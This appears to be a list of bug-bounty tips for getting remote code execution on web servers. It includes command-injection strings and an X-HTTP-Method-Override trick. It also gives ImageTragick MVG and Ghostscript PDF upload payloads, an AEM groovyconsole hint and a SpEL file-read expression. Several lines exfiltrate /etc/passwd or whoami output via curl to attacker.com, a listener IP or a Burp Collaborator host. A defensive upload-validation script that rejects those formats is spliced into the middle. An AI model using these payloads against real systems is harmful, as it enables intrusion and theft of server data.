If the server only allows the GET and POST methods, then try adding “X-HTTP-Method-Override: PUT” to achieve RCE via the PUT method.
Blind RCE - Grabs /etc/passwd and dumps it to your netcat listener via POST:
cat /etc/passwd | curl -X POST -d @- http://yourip:yourport/
Found an endpoint which is doing something with images? Give this a shot > request=input&&id , request=input|id , request=input`id` or you can even setup a NC & try request=input&&http://wgetyourserver.com:port & so on. Fuzz Fuzz Fuzz #InfoSecurity #Infosec #BugBounty
If you ever get the ability to run arbitrary Python code on a server try to get RCE by running: import os;os.system("ls"); Replacing "ls" with any number of shell commands.
Recon to RCE: Google "upload" site:"target" -> upload form -> ImageTragick MVG -> RCE PoC: push graphic-context viewbox 0 0 200 200 fill 'url(https://example.123 "|curl -d "@/etc/passwd" -X POST https://xxx.burpcollaborator.net/test1")' pop graphic-context
RCE on PDF upload: Content-Disposition: form-data; name="fileToUpload"; filename="pwn.pdf" Content-Type: application/pdf %!PS currentdevice null true mark /OutputICCProfile (%pipe%curl http://attacker.com/?a=$(whoami|base64…) ) .putdeviceparams quit #BugBounty
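An added, editor-written check (not part of any of the tips above) that a defender can put in front of the image/PDF upload handlers the ImageTragick MVG and PostScript "pwn.pdf" tips aim at: it verifies the body's magic bytes against the declared Content-Type and refuses PostScript or MVG text before anything reaches ImageMagick or Ghostscript. The signature table, the function names and the constructed samples are the editor's assumptions.

```python
import re

# Magic bytes for the types an image/PDF upload endpoint would expect (editor's table).
MAGIC = {
    "application/pdf": (b"%PDF-",),
    "image/png": (b"\x89PNG\r\n\x1a\n",),
    "image/jpeg": (b"\xff\xd8\xff",),
    "image/gif": (b"GIF87a", b"GIF89a"),
}

# Text formats a converter would interpret as instructions; neither is a valid upload here.
SUSPICIOUS_TEXT = [
    ("postscript", re.compile(rb"^\s*%!PS")),                   # "%!PS currentdevice ..."
    ("mvg", re.compile(rb"^\s*push\s+graphic-context", re.M)),  # "push graphic-context ..."
]


def inspect_upload(declared_type: str, data: bytes) -> dict:
    """Return {'ok': bool, 'reason': str}; ok only if the body matches the declared type."""
    head = data[:1024]
    for name, pattern in SUSPICIOUS_TEXT:
        if pattern.search(head):
            return {"ok": False, "reason": f"interpreter input detected: {name}"}
    sigs = MAGIC.get(declared_type)
    if sigs is None:
        return {"ok": False, "reason": f"content type not allowed: {declared_type}"}
    if not any(head.startswith(s) for s in sigs):
        return {"ok": False, "reason": f"body does not match {declared_type} magic bytes"}
    return {"ok": True, "reason": "magic bytes match declared type"}


# Constructed samples: a real PDF header, and the two PoC shapes from the tips
# above with the command part replaced by a placeholder.
SAMPLES = {
    "real_pdf": ("application/pdf", b"%PDF-1.4\n%\xe2\xe3\xcf\xd3\n1 0 obj\n"),
    "ps_as_pdf": ("application/pdf", b"%!PS\ncurrentdevice null true mark /OutputICCProfile (%pipe%PLACEHOLDER) .putdeviceparams\nquit\n"),
    "mvg_as_png": ("image/png", b"push graphic-context\nviewbox 0 0 200 200\nfill 'url(PLACEHOLDER)'\npop graphic-context\n"),
}


def run_samples() -> dict:
    """Map each sample name to whether inspect_upload accepts it."""
    return {name: inspect_upload(t, body)["ok"] for name, (t, body) in SAMPLES.items()}


if __name__ == "__main__":
    for name, ok in run_samples().items():
        print(f"{name}: {'accepted' if ok else 'rejected'}")
```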
Does the target use AEM? Try this path: target[.]com/etc/groovyconsole.html and use the payload in the pic. If you're lucky enough you can have nice RCE ;) Good luck :) #bugbounty #bugcrowd #bugbountytips
If you can get SpEL injection but can't get RCE, try exfiltrating a file with B64 encoding: T(java.util.Base64).getEncoder().encodeToString(T(org.apache.commons.io.FileUtils).readFileToString('/proc/self/cmdline').getBytes())